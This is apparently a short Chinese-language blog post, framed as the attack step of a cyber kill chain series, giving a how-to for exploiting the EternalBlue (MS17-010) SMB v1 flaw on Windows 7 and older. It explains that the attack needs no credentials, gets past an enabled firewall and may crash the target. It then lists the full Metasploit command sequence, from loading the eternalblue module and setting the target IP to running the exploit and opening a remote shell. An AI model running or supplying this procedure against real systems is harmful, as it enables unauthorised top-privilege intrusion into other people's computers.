cyber kill chain手法

[4.攻擊] 永恆之藍eternalblue-ms17-010漏洞攻擊

這是一個利用windows SMB V1請求時發生的系統漏洞來取得最高權限的一個入侵方式,是一個2017年的漏洞。

目前對於win7及更早的作業系統有效,入侵他不需要有任何爆破帳號密碼的過程,非常的方便快速,唯一的缺點是有可能導致對方電腦當機重開。所以不一定每次都會成功,但是多執行幾次就會成功了。

這個漏洞方便就是,只要SMB網芳有開縱使他防火牆都開著、縱使你沒有的帳號密碼,一樣可以打進去(只是時間似乎會比較久)

本漏洞需要用到kali linux自帶的Metasploit渗透工具,你如果是其他系統,可能就需要先安裝他一下

另外就是他會需要再本機開啟4444 port給對方連過來,所以你一定要跟他在同一個網段,不然也會失敗。

msfconsole  #開啟Metasploit 要等他跑一下
use exploit/windows/smb/ms17_010_eternalblue
show options
set rhosts 192.168.2.171  #記得改IP
check
exploit  #或是run都可以
shell #進入cmd

Be the First to comment.

Leave a Comment

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *

(若看不到驗證碼,請重新整理網頁。)